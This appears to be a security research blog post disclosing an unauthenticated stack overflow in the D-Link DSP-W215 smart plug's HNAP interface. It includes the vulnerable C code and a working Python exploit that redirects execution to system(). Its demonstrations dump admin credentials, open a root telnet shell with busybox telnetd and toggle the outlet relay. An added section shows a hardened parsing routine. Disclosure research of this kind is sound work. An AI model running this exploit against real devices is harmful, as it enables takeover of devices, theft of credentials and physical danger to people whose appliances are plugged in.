Hacking the D-Link DSP-W215 Smart Plug

http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/

The D-Link DSP-W215 Smart Plug is a wireless home automation device for monitoring and controlling electrical outlets. It isn’t readily available from Amazon or Best Buy yet, but the firmware is up on D-Link’s web site.

[Image: The D-Link DSP-W215]

TL;DR, the DSP-W215 contains an unauthenticated stack overflow that can be exploited to take complete control of the device, and anything connected to its AC outlet.


The DSP-W215 firmware contains all the usual stuff you would expect from a Linux-based device:

[Image: DSP-W215 Firmware Analysis (binwalk output)]

After unpacking and examining the contents of the file system, I found that the smart plug doesn’t have a normal web-based interface; you are expected to configure it using D-Link’s Android/iOS app. The apps, however, appear to use the Home Network Administration Protocol (HNAP) to talk to the smart plug.

Being a SOAP-based protocol, HNAP is served up by a lighttpd server running on the smart plug, and the following excerpt from the lighttpd configuration file(s) shows that HNAP requests are passed off to the /www/my_cgi.cgi binary for processing:

...
alias.url += ( "/HNAP1/" => "/www/my_cgi.cgi",
               "/HNAP1"  => "/www/my_cgi.cgi",
...

While HNAP is an authenticated protocol, some HNAP actions – specifically the GetDeviceSettings action – do not require authentication:

[Image: XML Output from the GetDeviceSettings Action]

GetDeviceSettings only provides a list of supported actions and isn’t of much use by itself, but this does mean that my_cgi.cgi has to parse the request prior to checking for authentication.

HNAP request data is handled by the do_hnap function in my_cgi.cgi. Since HNAP actions are sent as HTTP POST requests, do_hnap first processes the Content-Length header specified in the POST request:

[Image: Converting the Content-Length String to an Integer]

Then, naturally, it reads content_length bytes into a fixed-size stack buffer:

[Image: fgetc Read Loop]

The following C code is perhaps a bit clearer:

int content_length, i;
char *content_length_str;
char post_data_buf[500000];                 /* fixed-size stack buffer */

content_length = 0;
content_length_str = getenv("CONTENT_LENGTH");
if(content_length_str)
{
   /* the header value is trusted as-is; nothing compares it to the buffer size */
   content_length = strtol(content_length_str, NULL, 10);
}
memset(post_data_buf, 0, 500000);
/* reads exactly content_length bytes, so anything over 500,000 runs off the end of the buffer */
for(i=0; i<content_length; i++)
{
   post_data_buf[i] = fgetc(stdin);
}

From the memset it is obvious that the post_data_buf stack buffer is only intended to hold up to 500,000 bytes. Since the Content-Length header is trusted blindly, POSTing more than 500,000 bytes will overflow this buffer, but there are quite a few more variables on the stack; it takes 1,000,020 bytes to overwrite everything on the stack up to the saved return address:
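As an added example (my own code, not the author's and not D-Link's firmware), this is what the same read looks like once the Content-Length value is validated against the buffer before it is used: the parse refuses signs, trailing garbage and any length that does not fit, and the read is bounded by that validated length. POST_BUF_SIZE, parse_content_length, read_post_body and hardened_read_demo are names chosen here; the demo feeds a constructed 18-byte body through tmpfile() so it runs offline.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define POST_BUF_SIZE 500000   /* same fixed buffer size my_cgi.cgi uses */

/* Strict CONTENT_LENGTH parse: unsigned decimal digits only, and it must fit
 * in the buffer with one byte spare for a terminating NUL. -1 rejects it. */
long parse_content_length(const char *s, size_t buf_size)
{
    char *end;
    long n;
    if (s == NULL || *s < '0' || *s > '9')      /* empty, signed or non-numeric */
        return -1;
    errno = 0;
    n = strtol(s, &end, 10);
    if (errno == ERANGE || *end != '\0' || n < 0 || (size_t)n >= buf_size)
        return -1;
    return n;
}

/* Bounded replacement for the fgetc loop: never writes past buf_size, and
 * rejects a body shorter than the declared length instead of guessing. */
long read_post_body(const char *content_length_str, FILE *in,
                    char *buf, size_t buf_size)
{
    long want = parse_content_length(content_length_str, buf_size);
    if (want < 0)
        return -1;
    memset(buf, 0, buf_size);
    if (fread(buf, 1, (size_t)want, in) != (size_t)want)
        return -1;
    return want;                       /* buf[want] is already NUL from memset */
}

/* Honest request on constructed input: an 18-byte SOAP body with Content-Length 18.
 * Returns the byte count read_post_body() accepted and verified, or -1. */
long hardened_read_demo(void)
{
    static char buf[POST_BUF_SIZE];
    const char *body = "<soap>hello</soap>";          /* constructed sample body */
    FILE *in = tmpfile();
    if (in == NULL) return -1;
    fputs(body, in);
    rewind(in);
    long n = read_post_body("18", in, buf, sizeof buf);
    fclose(in);
    return (n == 18 && strcmp(buf, body) == 0) ? n : -1;
}
```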

# Overflow $ra with 0x41414141
perl -e 'print "D"x1000020; print "A"x4' > overflow.txt
wget --post-file=overflow.txt http://192.168.0.60/HNAP1/

[Image: $ra Overwritten With 0x41414141]

What’s more, because the POST data is read into the buffer with an fgetc loop, there are no bad bytes – even NULL bytes are allowed. That’s nice, because at 0x00405CAC in my_cgi.cgi there is this little bit of code that loads $a0 (the first function argument register) with a pointer to the stack ($sp+0x28) and calls system():

system($sp+0x28);

We just need to overwrite the saved return address with 0x00405CAC and put whatever command we want to run onto the stack at offset 0x28:

import sys
import urllib2
command = sys.argv[1]
buf =  "D" * 1000020         # Fill up the stack buffer
buf += "\x00\x40\x5C\xAC"    # Overwrite the return address on the stack
buf += "E" * 0x28            # Stack filler
buf += command               # Command to execute
buf += "\x00"                # NULL terminate the command string
req = urllib2.Request("http://192.168.0.60/HNAP1/", buf)
print urllib2.urlopen(req).read()

Even better, the stdout of any command we execute is returned in the server’s response:

eve@eve:~$ ./exploit.py 'ls -l /'
drwxr-xr-x    2 1000     1000         4096 Jan 14 14:16 bin
drwxrwxr-x    3 1000     1000         4096 May  9 16:04 dev
drwxrwxr-x    3 1000     1000         4096 Sep  3  2010 etc
drwxrwxr-x    3 1000     1000         4096 Jan 14 14:16 lib
drwxr-xr-x    3 1000     1000         4096 Jan 14 14:16 libexec
lrwxrwxrwx    1 1000     1000           11 May  9 16:01 linuxrc -> bin/busybox
drwxrwxr-x    2 1000     1000         4096 Nov 11  2008 lost+found
drwxrwxr-x    7 1000     1000         4096 May  9 15:44 mnt
drwxr-xr-x    2 1000     1000         4096 Jan 14 14:16 mydlink
drwxrwxr-x    2 1000     1000         4096 Nov 11  2008 proc
drwxrwxr-x    2 1000     1000         4096 May  9 17:49 root
drwxr-xr-x    2 1000     1000         4096 Jan 14 14:16 sbin
drwxrwxr-x    3 1000     1000         4096 May 15 04:27 tmp
drwxrwxr-x    7 1000     1000         4096 Jan 14 14:16 usr
drwxrwxr-x    3 1000     1000         4096 May  9 16:04 var
-rw-r--r--    1 1000     1000           17 Jan 14 14:16 version
drwxrwxr-x    8 1000     1000         4096 May  9 16:52 www

We can dump configuration settings and admin creds:

eve@eve:~$ ./exploit.py 'nvram show' | grep admin
admin_user_pwd=200416
admin_user_tbl=0/admin_user_name/admin_user_pwd/admin_level
admin_level=1
admin_user_name=admin
storage_user_00=0/admin//

Or start up a telnet server to get a proper root shell:

eve@eve:~$ ./exploit.py 'busybox telnetd -l /bin/sh'
eve@eve:~$ telnet 192.168.0.60
Trying 192.168.0.60...
Connected to 192.168.0.60.
Escape character is '^]'.
BusyBox v1.01 (2014.01.14-12:12+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.
#

After reversing a bit more of my_cgi.cgi, I found that all you need to do to turn the wall outlet on and off is execute /var/sbin/relay:

/var/sbin/relay 1   # Turns outlet on
/var/sbin/relay 0   # Turns outlet off

You can run a little script on the smart plug to play blinkenlights:

#!/bin/sh
# Toggle the outlet forever: OOK alternates between 1 (on) and 0 (off)
OOK=1
while true
do
   /var/sbin/relay $OOK
   if [ $OOK -eq 1 ]
   then
      OOK=0
   else
      OOK=1
   fi
done

Controlling a wall outlet can have more serious implications however, as exemplified by the following D-Link advertisement:

[Image: A Rather Misleading D-Link Advertisement]

While the smart plug may be able to detect overheating, I suspect that it can only detect if the smart plug itself is overheating – it has no way to monitor the actual temperature of any devices plugged into the wall outlet. So, if you’ve left a space heater plugged in to the outlet and some nefarious person surreptitiously turns the outlet back on, you’re in for a bad day.

It’s unclear if the smart plug attempts to make itself remotely accessible (using UPnP port forwarding rules, for example), as the Android configuration app simply doesn’t work. It couldn’t even establish an initial connection to the smart plug, although my laptop had no problems. When it finally did, it refused to create a MyDlink account for remote access, with the very helpful error message “could not create account”. Although it said it had configured the smart plug to connect to my wireless network, the smart plug did not connect to my network, and it ceased to present itself as an access point for initial configuration. With the wireless borked and no ethernet connection, I was left with no means to further communicate with it. Oh, and there’s no hard reset button either. Ah well, it’s going in the bin anyway.

I suspect that anyone else who has purchased this device hasn’t been able to get it to work either, which is probably a good thing. At any rate, I’d be wary of connecting such a device to either my network or my appliances.

Incidentally, D-Link’s DIR-505L travel router is also affected by this bug, as it has a nearly identical my_cgi.cgi binary.

PoC code for both devices can be found here.
